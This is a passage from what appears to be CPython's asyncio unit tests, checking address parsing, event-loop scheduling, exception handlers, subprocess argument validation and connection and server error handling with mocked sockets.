(INET, STREAM, TCP, '', ('1.2.3.4', 1)),
base_events._ipaddr_info('1.2.3.4', 1, UNSPEC, STREAM, TCP))
self.assertEqual(
(INET, DGRAM, UDP, '', ('1.2.3.4', 1)),
base_events._ipaddr_info('1.2.3.4', 1, UNSPEC, DGRAM, UDP))
# Socket type STREAM implies TCP protocol.
self.assertEqual(
(INET, STREAM, TCP, '', ('1.2.3.4', 1)),
base_events._ipaddr_info('1.2.3.4', 1, UNSPEC, STREAM, 0))
# Socket type DGRAM implies UDP protocol.
self.assertEqual(
(INET, DGRAM, UDP, '', ('1.2.3.4', 1)),
base_events._ipaddr_info('1.2.3.4', 1, UNSPEC, DGRAM, 0))
# No socket type.
self.assertIsNone(
base_events._ipaddr_info('1.2.3.4', 1, UNSPEC, 0, 0))
# IPv4 address with family IPv6.
self.assertIsNone(
base_events._ipaddr_info('1.2.3.4', 1, INET6, STREAM, TCP))
self.assertEqual(
(INET6, STREAM, TCP, '', ('::3', 1, 0, 0)),
base_events._ipaddr_info('::3', 1, INET6, STREAM, TCP))
self.assertEqual(
(INET6, STREAM, TCP, '', ('::3', 1, 0, 0)),
base_events._ipaddr_info('::3', 1, UNSPEC, STREAM, TCP))
# IPv6 address with family IPv4.
self.assertIsNone(
base_events._ipaddr_info('::3', 1, INET, STREAM, TCP))
# IPv6 address with zone index.
self.assertIsNone(
base_events._ipaddr_info('::3%lo0', 1, INET6, STREAM, TCP))
def test_port_parameter_types(self):
# Test obscure kinds of arguments for "port".
INET = socket.AF_INET
STREAM = socket.SOCK_STREAM
TCP = socket.IPPROTO_TCP
self.assertEqual(
(INET, STREAM, TCP, '', ('1.2.3.4', 0)),
base_events._ipaddr_info('1.2.3.4', None, INET, STREAM, TCP))
self.assertEqual(
(INET, STREAM, TCP, '', ('1.2.3.4', 0)),
base_events._ipaddr_info('1.2.3.4', b'', INET, STREAM, TCP))
self.assertEqual(
(INET, STREAM, TCP, '', ('1.2.3.4', 0)),
base_events._ipaddr_info('1.2.3.4', '', INET, STREAM, TCP))
self.assertEqual(
(INET, STREAM, TCP, '', ('1.2.3.4', 1)),
base_events._ipaddr_info('1.2.3.4', '1', INET, STREAM, TCP))
self.assertEqual(
(INET, STREAM, TCP, '', ('1.2.3.4', 1)),
base_events._ipaddr_info('1.2.3.4', b'1', INET, STREAM, TCP))
@patch_socket
def test_ipaddr_info_no_inet_pton(self, m_socket):
del m_socket.inet_pton
self.assertIsNone(base_events._ipaddr_info('1.2.3.4', 1,
socket.AF_INET,
socket.SOCK_STREAM,
socket.IPPROTO_TCP))
class BaseEventLoopTests(test_utils.TestCase):
def setUp(self):
super().setUp()
self.loop = base_events.BaseEventLoop()
self.loop._selector = mock.Mock()
self.loop._selector.select.return_value = ()
self.set_event_loop(self.loop)
def test_not_implemented(self):
m = mock.Mock()
self.assertRaises(
NotImplementedError,
self.loop._make_socket_transport, m, m)
self.assertRaises(
NotImplementedError,
self.loop._make_ssl_transport, m, m, m, m)
self.assertRaises(
NotImplementedError,
self.loop._make_datagram_transport, m, m)
self.assertRaises(
NotImplementedError, self.loop._process_events, [])
self.assertRaises(
NotImplementedError, self.loop._write_to_self)
self.assertRaises(
NotImplementedError,
self.loop._make_read_pipe_transport, m, m)
self.assertRaises(
NotImplementedError,
self.loop._make_write_pipe_transport, m, m)
gen = self.loop._make_subprocess_transport(m, m, m, m, m, m, m)
with self.assertRaises(NotImplementedError):
gen.send(None)
def test_close(self):
self.assertFalse(self.loop.is_closed())
self.loop.close()
self.assertTrue(self.loop.is_closed())
# it should be possible to call close() more than once
self.loop.close()
self.loop.close()
# operation blocked when the loop is closed
f = asyncio.Future(loop=self.loop)
self.assertRaises(RuntimeError, self.loop.run_forever)
self.assertRaises(RuntimeError, self.loop.run_until_complete, f)
def test__add_callback_handle(self):
h = asyncio.Handle(lambda: False, (), self.loop, None)
self.loop._add_callback(h)
self.assertFalse(self.loop._scheduled)
self.assertIn(h, self.loop._ready)
def test__add_callback_cancelled_handle(self):
h = asyncio.Handle(lambda: False, (), self.loop, None)
h.cancel()
self.loop._add_callback(h)
self.assertFalse(self.loop._scheduled)
self.assertFalse(self.loop._ready)
def test_set_default_executor(self):
executor = mock.Mock()
self.loop.set_default_executor(executor)
self.assertIs(executor, self.loop._default_executor)
def test_call_soon(self):
def cb():
pass
h = self.loop.call_soon(cb)
self.assertEqual(h._callback, cb)
self.assertIsInstance(h, asyncio.Handle)
self.assertIn(h, self.loop._ready)
def test_call_soon_non_callable(self):
self.loop.set_debug(True)
with self.assertRaisesRegex(TypeError, 'a callable object'):
self.loop.call_soon(1)
def test_call_later(self):
def cb():
pass
h = self.loop.call_later(10.0, cb)
self.assertIsInstance(h, asyncio.TimerHandle)
self.assertIn(h, self.loop._scheduled)
self.assertNotIn(h, self.loop._ready)
def test_call_later_negative_delays(self):
calls = []
def cb(arg):
calls.append(arg)
self.loop._process_events = mock.Mock()
self.loop.call_later(-1, cb, 'a')
self.loop.call_later(-2, cb, 'b')
test_utils.run_briefly(self.loop)
self.assertEqual(calls, ['b', 'a'])
def test_time_and_call_at(self):
def cb():
self.loop.stop()
self.loop._process_events = mock.Mock()
delay = 0.1
when = self.loop.time() + delay
self.loop.call_at(when, cb)
t0 = self.loop.time()
self.loop.run_forever()
dt = self.loop.time() - t0
# 50 ms: maximum granularity of the event loop
self.assertGreaterEqual(dt, delay - 0.050, dt)
# tolerate a difference of +800 ms because some Python buildbots
# are really slow
self.assertLessEqual(dt, 0.9, dt)
def check_thread(self, loop, debug):
def cb():
pass
loop.set_debug(debug)
if debug:
msg = ("Non-thread-safe operation invoked on an event loop other "
"than the current one")
with self.assertRaisesRegex(RuntimeError, msg):
loop.call_soon(cb)
with self.assertRaisesRegex(RuntimeError, msg):
loop.call_later(60, cb)
with self.assertRaisesRegex(RuntimeError, msg):
loop.call_at(loop.time() + 60, cb)
else:
loop.call_soon(cb)
loop.call_later(60, cb)
loop.call_at(loop.time() + 60, cb)
def test_check_thread(self):
def check_in_thread(loop, event, debug, create_loop, fut):
# wait until the event loop is running
event.wait()
try:
if create_loop:
loop2 = base_events.BaseEventLoop()
try:
asyncio.set_event_loop(loop2)
self.check_thread(loop, debug)
finally:
asyncio.set_event_loop(None)
loop2.close()
else:
self.check_thread(loop, debug)
except Exception as exc:
loop.call_soon_threadsafe(fut.set_exception, exc)
else:
loop.call_soon_threadsafe(fut.set_result, None)
def test_thread(loop, debug, create_loop=False):
event = threading.Event()
fut = asyncio.Future(loop=loop)
loop.call_soon(event.set)
args = (loop, event, debug, create_loop, fut)
thread = threading.Thread(target=check_in_thread, args=args)
thread.start()
loop.run_until_complete(fut)
thread.join()
self.loop._process_events = mock.Mock()
self.loop._write_to_self = mock.Mock()
# raise RuntimeError if the thread has no event loop
test_thread(self.loop, True)
# check disabled if debug mode is disabled
test_thread(self.loop, False)
# raise RuntimeError if the event loop of the thread is not the called
# event loop
test_thread(self.loop, True, create_loop=True)
# check disabled if debug mode is disabled
test_thread(self.loop, False, create_loop=True)
def test__run_once(self):
h1 = asyncio.TimerHandle(time.monotonic() + 5.0, lambda: True, (),
self.loop, None)
h2 = asyncio.TimerHandle(time.monotonic() + 10.0, lambda: True, (),
self.loop, None)
h1.cancel()
self.loop._process_events = mock.Mock()
self.loop._scheduled.append(h1)
self.loop._scheduled.append(h2)
self.loop._run_once()
t = self.loop._selector.select.call_args[0][0]
self.assertTrue(9.5 < t < 10.5, t)
self.assertEqual([h2], self.loop._scheduled)
self.assertTrue(self.loop._process_events.called)
def test_set_debug(self):
self.loop.set_debug(True)
self.assertTrue(self.loop.get_debug())
self.loop.set_debug(False)
self.assertFalse(self.loop.get_debug())
@mock.patch('asyncio.base_events.logger')
def test__run_once_logging(self, m_logger):
def slow_select(timeout):
# Sleep a bit longer than a second to avoid timer resolution
# issues.
time.sleep(1.1)
return []
# logging needs debug flag
self.loop.set_debug(True)
# Log to INFO level if timeout > 1.0 sec.
self.loop._selector.select = slow_select
self.loop._process_events = mock.Mock()
self.loop._run_once()
self.assertEqual(logging.INFO, m_logger.log.call_args[0][0])
def fast_select(timeout):
time.sleep(0.001)
return []
self.loop._selector.select = fast_select
self.loop._run_once()
self.assertEqual(logging.DEBUG, m_logger.log.call_args[0][0])
def test__run_once_schedule_handle(self):
handle = None
processed = False
def cb(loop):
nonlocal processed, handle
processed = True
handle = loop.call_soon(lambda: True)
h = asyncio.TimerHandle(time.monotonic() - 1, cb, (self.loop,),
self.loop, None)
self.loop._process_events = mock.Mock()
self.loop._scheduled.append(h)
self.loop._run_once()
self.assertTrue(processed)
self.assertEqual([handle], list(self.loop._ready))
def test__run_once_cancelled_event_cleanup(self):
self.loop._process_events = mock.Mock()
self.assertTrue(
0 < base_events._MIN_CANCELLED_TIMER_HANDLES_FRACTION < 1.0)
def cb():
pass
# Set up one "blocking" event that will not be cancelled to
# ensure later cancelled events do not make it to the head
# of the queue and get cleaned.
not_cancelled_count = 1
self.loop.call_later(3000, cb)
# Add less than threshold (base_events._MIN_SCHEDULED_TIMER_HANDLES)
# cancelled handles, ensure they aren't removed
cancelled_count = 2
for x in range(2):
h = self.loop.call_later(3600, cb)
h.cancel()
# Add some cancelled events that will be at head and removed
cancelled_count += 2
for x in range(2):
h = self.loop.call_later(100, cb)
h.cancel()
# This test is invalid if _MIN_SCHEDULED_TIMER_HANDLES is too low
self.assertLessEqual(cancelled_count + not_cancelled_count,
base_events._MIN_SCHEDULED_TIMER_HANDLES)
self.assertEqual(self.loop._timer_cancelled_count, cancelled_count)
self.loop._run_once()
cancelled_count -= 2
self.assertEqual(self.loop._timer_cancelled_count, cancelled_count)
self.assertEqual(len(self.loop._scheduled),
cancelled_count + not_cancelled_count)
# Need enough events to pass _MIN_CANCELLED_TIMER_HANDLES_FRACTION
# so that deletion of cancelled events will occur on next _run_once
add_cancel_count = int(math.ceil(
base_events._MIN_SCHEDULED_TIMER_HANDLES *
base_events._MIN_CANCELLED_TIMER_HANDLES_FRACTION)) + 1
add_not_cancel_count = max(base_events._MIN_SCHEDULED_TIMER_HANDLES -
add_cancel_count, 0)
# Add some events that will not be cancelled
not_cancelled_count += add_not_cancel_count
for x in range(add_not_cancel_count):
self.loop.call_later(3600, cb)
# Add enough cancelled events
cancelled_count += add_cancel_count
for x in range(add_cancel_count):
h = self.loop.call_later(3600, cb)
h.cancel()
# Ensure all handles are still scheduled
self.assertEqual(len(self.loop._scheduled),
cancelled_count + not_cancelled_count)
self.loop._run_once()
# Ensure cancelled events were removed
self.assertEqual(len(self.loop._scheduled), not_cancelled_count)
# Ensure only uncancelled events remain scheduled
self.assertTrue(all([not x._cancelled for x in self.loop._scheduled]))
def test_run_until_complete_type_error(self):
self.assertRaises(TypeError,
self.loop.run_until_complete, 'blah')
def test_run_until_complete_loop(self):
task = asyncio.Future(loop=self.loop)
other_loop = self.new_test_loop()
self.addCleanup(other_loop.close)
self.assertRaises(ValueError,
other_loop.run_until_complete, task)
def test_run_until_complete_loop_orphan_future_close_loop(self):
class ShowStopper(BaseException):
pass
async def foo(delay):
await asyncio.sleep(delay, loop=self.loop)
def throw():
raise ShowStopper
self.loop._process_events = mock.Mock()
self.loop.call_soon(throw)
try:
self.loop.run_until_complete(foo(0.1))
except ShowStopper:
pass
# This call fails if run_until_complete does not clean up
# done-callback for the previous future.
self.loop.run_until_complete(foo(0.2))
def test_subprocess_exec_invalid_args(self):
args = [sys.executable, '-c', 'pass']
# missing program parameter (empty args)
self.assertRaises(TypeError,
self.loop.run_until_complete, self.loop.subprocess_exec,
asyncio.SubprocessProtocol)
# expected multiple arguments, not a list
self.assertRaises(TypeError,
self.loop.run_until_complete, self.loop.subprocess_exec,
asyncio.SubprocessProtocol, args)
# program arguments must be strings, not int
self.assertRaises(TypeError,
self.loop.run_until_complete, self.loop.subprocess_exec,
asyncio.SubprocessProtocol, sys.executable, 123)
# universal_newlines, shell, bufsize must not be set
self.assertRaises(TypeError,
self.loop.run_until_complete, self.loop.subprocess_exec,
asyncio.SubprocessProtocol, *args, universal_newlines=True)
self.assertRaises(TypeError,
self.loop.run_until_complete, self.loop.subprocess_exec,
asyncio.SubprocessProtocol, *args, shell=True)
self.assertRaises(TypeError,
self.loop.run_until_complete, self.loop.subprocess_exec,
asyncio.SubprocessProtocol, *args, bufsize=4096)
def test_subprocess_shell_invalid_args(self):
# expected a string, not an int or a list
self.assertRaises(TypeError,
self.loop.run_until_complete, self.loop.subprocess_shell,
asyncio.SubprocessProtocol, 123)
self.assertRaises(TypeError,
self.loop.run_until_complete, self.loop.subprocess_shell,
asyncio.SubprocessProtocol, [sys.executable, '-c', 'pass'])
# universal_newlines, shell, bufsize must not be set
self.assertRaises(TypeError,
self.loop.run_until_complete, self.loop.subprocess_shell,
asyncio.SubprocessProtocol, 'exit 0', universal_newlines=True)
self.assertRaises(TypeError,
self.loop.run_until_complete, self.loop.subprocess_shell,
asyncio.SubprocessProtocol, 'exit 0', shell=True)
self.assertRaises(TypeError,
self.loop.run_until_complete, self.loop.subprocess_shell,
asyncio.SubprocessProtocol, 'exit 0', bufsize=4096)
def test_default_exc_handler_callback(self):
self.loop._process_events = mock.Mock()
def zero_error(fut):
fut.set_result(True)
1/0
# Test call_soon (events.Handle)
with mock.patch('asyncio.base_events.logger') as log:
fut = asyncio.Future(loop=self.loop)
self.loop.call_soon(zero_error, fut)
fut.add_done_callback(lambda fut: self.loop.stop())
self.loop.run_forever()
log.error.assert_called_with(
test_utils.MockPattern('Exception in callback.*zero'),
exc_info=(ZeroDivisionError, MOCK_ANY, MOCK_ANY))
# Test call_later (events.TimerHandle)
with mock.patch('asyncio.base_events.logger') as log:
fut = asyncio.Future(loop=self.loop)
self.loop.call_later(0.01, zero_error, fut)
fut.add_done_callback(lambda fut: self.loop.stop())
self.loop.run_forever()
log.error.assert_called_with(
test_utils.MockPattern('Exception in callback.*zero'),
exc_info=(ZeroDivisionError, MOCK_ANY, MOCK_ANY))
def test_default_exc_handler_coro(self):
self.loop._process_events = mock.Mock()
@asyncio.coroutine
def zero_error_coro():
yield from asyncio.sleep(0.01, loop=self.loop)
1/0
# Test Future.__del__
with mock.patch('asyncio.base_events.logger') as log:
fut = asyncio.ensure_future(zero_error_coro(), loop=self.loop)
fut.add_done_callback(lambda *args: self.loop.stop())
self.loop.run_forever()
fut = None # Trigger Future.__del__ or futures._TracebackLogger
support.gc_collect()
if PY34:
# Future.__del__ in Python 3.4 logs error with
# an actual exception context
log.error.assert_called_with(
test_utils.MockPattern('.*exception was never retrieved'),
exc_info=(ZeroDivisionError, MOCK_ANY, MOCK_ANY))
else:
# futures._TracebackLogger logs only textual traceback
log.error.assert_called_with(
test_utils.MockPattern(
'.*exception was never retrieved.*ZeroDiv'),
exc_info=False)
def test_set_exc_handler_invalid(self):
with self.assertRaisesRegex(TypeError, 'A callable object or None'):
self.loop.set_exception_handler('spam')
def test_set_exc_handler_custom(self):
def zero_error():
1/0
def run_loop():
handle = self.loop.call_soon(zero_error)
self.loop._run_once()
return handle
self.loop.set_debug(True)
self.loop._process_events = mock.Mock()
self.assertIsNone(self.loop.get_exception_handler())
mock_handler = mock.Mock()
self.loop.set_exception_handler(mock_handler)
self.assertIs(self.loop.get_exception_handler(), mock_handler)
handle = run_loop()
mock_handler.assert_called_with(self.loop, {
'exception': MOCK_ANY,
'message': test_utils.MockPattern(
'Exception in callback.*zero_error'),
'handle': handle,
'source_traceback': handle._source_traceback,
})
mock_handler.reset_mock()
self.loop.set_exception_handler(None)
with mock.patch('asyncio.base_events.logger') as log:
run_loop()
log.error.assert_called_with(
test_utils.MockPattern(
'Exception in callback.*zero'),
exc_info=(ZeroDivisionError, MOCK_ANY, MOCK_ANY))
assert not mock_handler.called
def test_set_exc_handler_broken(self):
def run_loop():
def zero_error():
1/0
self.loop.call_soon(zero_error)
self.loop._run_once()
def handler(loop, context):
raise AttributeError('spam')
self.loop._process_events = mock.Mock()
self.loop.set_exception_handler(handler)
with mock.patch('asyncio.base_events.logger') as log:
run_loop()
log.error.assert_called_with(
test_utils.MockPattern(
'Unhandled error in exception handler'),
exc_info=(AttributeError, MOCK_ANY, MOCK_ANY))
def test_default_exc_handler_broken(self):
_context = None
class Loop(base_events.BaseEventLoop):
_selector = mock.Mock()
_process_events = mock.Mock()
def default_exception_handler(self, context):
nonlocal _context
_context = context
# Simulates custom buggy "default_exception_handler"
raise ValueError('spam')
loop = Loop()
self.addCleanup(loop.close)
asyncio.set_event_loop(loop)
def run_loop():
def zero_error():
1/0
loop.call_soon(zero_error)
loop._run_once()
with mock.patch('asyncio.base_events.logger') as log:
run_loop()
log.error.assert_called_with(
'Exception in default exception handler',
exc_info=True)
def custom_handler(loop, context):
raise ValueError('ham')
_context = None
loop.set_exception_handler(custom_handler)
with mock.patch('asyncio.base_events.logger') as log:
run_loop()
log.error.assert_called_with(
test_utils.MockPattern('Exception in default exception.*'
'while handling.*in custom'),
exc_info=True)
# Check that original context was passed to default
# exception handler.
self.assertIn('context', _context)
self.assertIs(type(_context['context']['exception']),
ZeroDivisionError)
def test_set_task_factory_invalid(self):
with self.assertRaisesRegex(
TypeError, 'task factory must be a callable or None'):
self.loop.set_task_factory(1)
self.assertIsNone(self.loop.get_task_factory())
def test_set_task_factory(self):
self.loop._process_events = mock.Mock()
class MyTask(asyncio.Task):
pass
@asyncio.coroutine
def coro():
pass
factory = lambda loop, coro: MyTask(coro, loop=loop)
self.assertIsNone(self.loop.get_task_factory())
self.loop.set_task_factory(factory)
self.assertIs(self.loop.get_task_factory(), factory)
task = self.loop.create_task(coro())
self.assertTrue(isinstance(task, MyTask))
self.loop.run_until_complete(task)
self.loop.set_task_factory(None)
self.assertIsNone(self.loop.get_task_factory())
task = self.loop.create_task(coro())
self.assertTrue(isinstance(task, asyncio.Task))
self.assertFalse(isinstance(task, MyTask))
self.loop.run_until_complete(task)
def test_env_var_debug(self):
code = '\n'.join((
'import asyncio',
'loop = asyncio.get_event_loop()',
'print(loop.get_debug())'))
# Test with -E to not fail if the unit test was run with
# PYTHONASYNCIODEBUG set to a non-empty string
sts, stdout, stderr = assert_python_ok('-E', '-c', code)
self.assertEqual(stdout.rstrip(), b'False')
sts, stdout, stderr = assert_python_ok('-c', code,
PYTHONASYNCIODEBUG='',
PYTHONDEVMODE='')
self.assertEqual(stdout.rstrip(), b'False')
sts, stdout, stderr = assert_python_ok('-c', code,
PYTHONASYNCIODEBUG='1',
PYTHONDEVMODE='')
self.assertEqual(stdout.rstrip(), b'True')
sts, stdout, stderr = assert_python_ok('-E', '-c', code,
PYTHONASYNCIODEBUG='1')
self.assertEqual(stdout.rstrip(), b'False')
# -X dev
sts, stdout, stderr = assert_python_ok('-E', '-X', 'dev',
'-c', code)
self.assertEqual(stdout.rstrip(), b'True')
def test_create_task(self):
class MyTask(asyncio.Task):
pass
@asyncio.coroutine
def test():
pass
class EventLoop(base_events.BaseEventLoop):
def create_task(self, coro):
return MyTask(coro, loop=loop)
loop = EventLoop()
self.set_event_loop(loop)
coro = test()
task = asyncio.ensure_future(coro, loop=loop)
self.assertIsInstance(task, MyTask)
# make warnings quiet
task._log_destroy_pending = False
coro.close()
def test_run_forever_keyboard_interrupt(self):
# Python issue #22601: ensure that the temporary task created by
# run_forever() consumes the KeyboardInterrupt and so don't log
# a warning
@asyncio.coroutine
def raise_keyboard_interrupt():
raise KeyboardInterrupt
self.loop._process_events = mock.Mock()
self.loop.call_exception_handler = mock.Mock()
try:
self.loop.run_until_complete(raise_keyboard_interrupt())
except KeyboardInterrupt:
pass
self.loop.close()
support.gc_collect()
self.assertFalse(self.loop.call_exception_handler.called)
def test_run_until_complete_baseexception(self):
# Python issue #22429: run_until_complete() must not schedule a pending
# call to stop() if the future raised a BaseException
@asyncio.coroutine
def raise_keyboard_interrupt():
raise KeyboardInterrupt
self.loop._process_events = mock.Mock()
try:
self.loop.run_until_complete(raise_keyboard_interrupt())
except KeyboardInterrupt:
pass
def func():
self.loop.stop()
func.called = True
func.called = False
try:
self.loop.call_soon(func)
self.loop.run_forever()
except KeyboardInterrupt:
pass
self.assertTrue(func.called)
def test_single_selecter_event_callback_after_stopping(self):
# Python issue #25593: A stopped event loop may cause event callbacks
# to run more than once.
event_sentinel = object()
callcount = 0
doer = None
def proc_events(event_list):
nonlocal doer
if event_sentinel in event_list:
doer = self.loop.call_soon(do_event)
def do_event():
nonlocal callcount
callcount += 1
self.loop.call_soon(clear_selector)
def clear_selector():
doer.cancel()
self.loop._selector.select.return_value = ()
self.loop._process_events = proc_events
self.loop._selector.select.return_value = (event_sentinel,)
for i in range(1, 3):
with self.subTest('Loop %d/2' % i):
self.loop.call_soon(self.loop.stop)
self.loop.run_forever()
self.assertEqual(callcount, 1)
def test_run_once(self):
# Simple test for test_utils.run_once(). It may seem strange
# to have a test for this (the function isn't even used!) but
# it's a de-factor standard API for library tests. This tests
# the idiom: loop.call_soon(loop.stop); loop.run_forever().
count = 0
def callback():
nonlocal count
count += 1
self.loop._process_events = mock.Mock()
self.loop.call_soon(callback)
test_utils.run_once(self.loop)
self.assertEqual(count, 1)
def test_run_forever_pre_stopped(self):
# Test that the old idiom for pre-stopping the loop works.
self.loop._process_events = mock.Mock()
self.loop.stop()
self.loop.run_forever()
self.loop._selector.select.assert_called_once_with(0)
async def leave_unfinalized_asyncgen(self):
# Create an async generator, iterate it partially, and leave it
# to be garbage collected.
# Used in async generator finalization tests.
# Depends on implementation details of garbage collector. Changes
# in gc may break this function.
status = {'started': False,
'stopped': False,
'finalized': False}
async def agen():
status['started'] = True
try:
for item in ['ZERO', 'ONE', 'TWO', 'THREE', 'FOUR']:
yield item
finally:
status['finalized'] = True
ag = agen()
ai = ag.__aiter__()
async def iter_one():
try:
item = await ai.__anext__()
except StopAsyncIteration:
return
if item == 'THREE':
status['stopped'] = True
return
asyncio.create_task(iter_one())
asyncio.create_task(iter_one())
return status
def test_asyncgen_finalization_by_gc(self):
# Async generators should be finalized when garbage collected.
self.loop._process_events = mock.Mock()
self.loop._write_to_self = mock.Mock()
with support.disable_gc():
status = self.loop.run_until_complete(self.leave_unfinalized_asyncgen())
while not status['stopped']:
test_utils.run_briefly(self.loop)
self.assertTrue(status['started'])
self.assertTrue(status['stopped'])
self.assertFalse(status['finalized'])
support.gc_collect()
test_utils.run_briefly(self.loop)
self.assertTrue(status['finalized'])
def test_asyncgen_finalization_by_gc_in_other_thread(self):
# Python issue 34769: If garbage collector runs in another
# thread, async generators will not finalize in debug
# mode.
self.loop._process_events = mock.Mock()
self.loop._write_to_self = mock.Mock()
self.loop.set_debug(True)
with support.disable_gc():
status = self.loop.run_until_complete(self.leave_unfinalized_asyncgen())
while not status['stopped']:
test_utils.run_briefly(self.loop)
self.assertTrue(status['started'])
self.assertTrue(status['stopped'])
self.assertFalse(status['finalized'])
self.loop.run_until_complete(
self.loop.run_in_executor(None, support.gc_collect))
test_utils.run_briefly(self.loop)
self.assertTrue(status['finalized'])
class MyProto(asyncio.Protocol):
done = None
def __init__(self, create_future=False):
self.state = 'INITIAL'
self.nbytes = 0
if create_future:
self.done = asyncio.Future()
def connection_made(self, transport):
self.transport = transport
assert self.state == 'INITIAL', self.state
self.state = 'CONNECTED'
transport.write(b'GET / HTTP/1.0\r\nHost: example.com\r\n\r\n')
def data_received(self, data):
assert self.state == 'CONNECTED', self.state
self.nbytes += len(data)
def eof_received(self):
assert self.state == 'CONNECTED', self.state
self.state = 'EOF'
def connection_lost(self, exc):
assert self.state in ('CONNECTED', 'EOF'), self.state
self.state = 'CLOSED'
if self.done:
self.done.set_result(None)
class MyDatagramProto(asyncio.DatagramProtocol):
done = None
def __init__(self, create_future=False, loop=None):
self.state = 'INITIAL'
self.nbytes = 0
if create_future:
self.done = asyncio.Future(loop=loop)
def connection_made(self, transport):
self.transport = transport
assert self.state == 'INITIAL', self.state
self.state = 'INITIALIZED'
def datagram_received(self, data, addr):
assert self.state == 'INITIALIZED', self.state
self.nbytes += len(data)
def error_received(self, exc):
assert self.state == 'INITIALIZED', self.state
def connection_lost(self, exc):
assert self.state == 'INITIALIZED', self.state
self.state = 'CLOSED'
if self.done:
self.done.set_result(None)
class BaseEventLoopWithSelectorTests(test_utils.TestCase):
def setUp(self):
super().setUp()
self.loop = asyncio.new_event_loop()
self.set_event_loop(self.loop)
@mock.patch('socket.getnameinfo')
def test_getnameinfo(self, m_gai):
m_gai.side_effect = lambda *args: 42
r = self.loop.run_until_complete(self.loop.getnameinfo(('abc', 123)))
self.assertEqual(r, 42)
@patch_socket
def test_create_connection_multiple_errors(self, m_socket):
class MyProto(asyncio.Protocol):
pass
@asyncio.coroutine
def getaddrinfo(*args, **kw):
yield from []
return [(2, 1, 6, '', ('107.6.106.82', 80)),
(2, 1, 6, '', ('107.6.106.82', 80))]
def getaddrinfo_task(*args, **kwds):
return asyncio.Task(getaddrinfo(*args, **kwds), loop=self.loop)
idx = -1
errors = ['err1', 'err2']
def _socket(*args, **kw):
nonlocal idx, errors
idx += 1
raise OSError(errors[idx])
m_socket.socket = _socket
self.loop.getaddrinfo = getaddrinfo_task
coro = self.loop.create_connection(MyProto, 'example.com', 80)
with self.assertRaises(OSError) as cm:
self.loop.run_until_complete(coro)
self.assertEqual(str(cm.exception), 'Multiple exceptions: err1, err2')
@patch_socket
def test_create_connection_timeout(self, m_socket):
# Ensure that the socket is closed on timeout
sock = mock.Mock()
m_socket.socket.return_value = sock
def getaddrinfo(*args, **kw):
fut = asyncio.Future(loop=self.loop)
addr = (socket.AF_INET, socket.SOCK_STREAM, 0, '',
('127.0.0.1', 80))
fut.set_result([addr])
return fut
self.loop.getaddrinfo = getaddrinfo
with mock.patch.object(self.loop, 'sock_connect',
side_effect=asyncio.TimeoutError):
coro = self.loop.create_connection(MyProto, '127.0.0.1', 80)
with self.assertRaises(asyncio.TimeoutError):
self.loop.run_until_complete(coro)
self.assertTrue(sock.close.called)
def test_create_connection_host_port_sock(self):
coro = self.loop.create_connection(
MyProto, 'example.com', 80, sock=object())
self.assertRaises(ValueError, self.loop.run_until_complete, coro)
def test_create_connection_wrong_sock(self):
sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
with sock:
coro = self.loop.create_connection(MyProto, sock=sock)
with self.assertRaisesRegex(ValueError,
'A Stream Socket was expected'):
self.loop.run_until_complete(coro)
def test_create_server_wrong_sock(self):
sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
with sock:
coro = self.loop.create_server(MyProto, sock=sock)
with self.assertRaisesRegex(ValueError,
'A Stream Socket was expected'):
self.loop.run_until_complete(coro)
def test_create_server_ssl_timeout_for_plain_socket(self):
coro = self.loop.create_server(
MyProto, 'example.com', 80, ssl_handshake_timeout=1)
with self.assertRaisesRegex(
ValueError,
'ssl_handshake_timeout is only meaningful with ssl'):
self.loop.run_until_complete(coro)
@unittest.skipUnless(hasattr(socket, 'SOCK_NONBLOCK'),
'no socket.SOCK_NONBLOCK (linux only)')
def test_create_server_stream_bittype(self):
sock = socket.socket(
socket.AF_INET, socket.SOCK_STREAM | socket.SOCK_NONBLOCK)
with sock:
coro = self.loop.create_server(lambda: None, sock=sock)
srv = self.loop.run_until_complete(coro)
srv.close()
self.loop.run_until_complete(srv.wait_closed())
@unittest.skipUnless(hasattr(socket, 'AF_INET6'), 'no IPv6 support')
def test_create_server_ipv6(self):
async def main():
srv = await asyncio.start_server(
lambda: None, '::1', 0, loop=self.loop)
try:
self.assertGreater(len(srv.sockets), 0)
finally:
srv.close()
await srv.wait_closed()
try:
self.loop.run_until_complete(main())
except OSError as ex:
if (hasattr(errno, 'EADDRNOTAVAIL') and
ex.errno == errno.EADDRNOTAVAIL):
self.skipTest('failed to bind to ::1')
else:
raise
def test_create_datagram_endpoint_wrong_sock(self):
sock = socket.socket(socket.AF_INET)
with sock:
coro = self.loop.create_datagram_endpoint(MyProto, sock=sock)
with self.assertRaisesRegex(ValueError,
'A UDP Socket was expected'):
self.loop.run_until_complete(coro)
def test_create_connection_no_host_port_sock(self):
coro = self.loop.create_connection(MyProto)
self.assertRaises(ValueError, self.loop.run_until_complete, coro)
def test_create_connection_no_getaddrinfo(self):
@asyncio.coroutine
def getaddrinfo(*args, **kw):
yield from []
def getaddrinfo_task(*args, **kwds):
return asyncio.Task(getaddrinfo(*args, **kwds), loop=self.loop)
self.loop.getaddrinfo = getaddrinfo_task
coro = self.loop.create_connection(MyProto, 'example.com', 80)
self.assertRaises(
OSError, self.loop.run_until_complete, coro)
def test_create_connection_connect_err(self):
async def getaddrinfo(*args, **kw):
return [(2, 1, 6, '', ('107.6.106.82', 80))]
def getaddrinfo_task(*args, **kwds):
return asyncio.Task(getaddrinfo(*args, **kwds), loop=self.loop)
self.loop.getaddrinfo = getaddrinfo_task
self.loop.sock_connect = mock.Mock()
self.loop.sock_connect.side_effect = OSError
coro = self.loop.create_connection(MyProto, 'example.com', 80)
self.assertRaises(
OSError, self.loop.run_until_complete, coro)
def test_create_connection_multiple(self):
@asyncio.coroutine
def getaddrinfo(*args, **kw):
return [(2, 1, 6, '', ('0.0.0.1', 80)),
(2, 1, 6, '', ('0.0.0.2', 80))]
def getaddrinfo_task(*args, **kwds):
return asyncio.Task(getaddrinfo(*args, **kwds), loop=self.loop)
self.loop.getaddrinfo = getaddrinfo_task
self.loop.sock_connect = mock.Mock()
self.loop.sock_connect.side_effect = OSError
coro = self.loop.create_connection(
MyProto, 'example.com', 80, family=socket.AF_INET)
with self.assertRaises(OSError):
self.loop.run_until_complete(coro)
@patch_socket
def test_create_connection_multiple_errors_local_addr(self, m_socket):
def bind(addr):
if addr[0] == '0.0.0.1':
err = OSError('Err')
err.strerror = 'Err'
raise err
m_socket.socket.return_value.bind = bind
@asyncio.coroutine
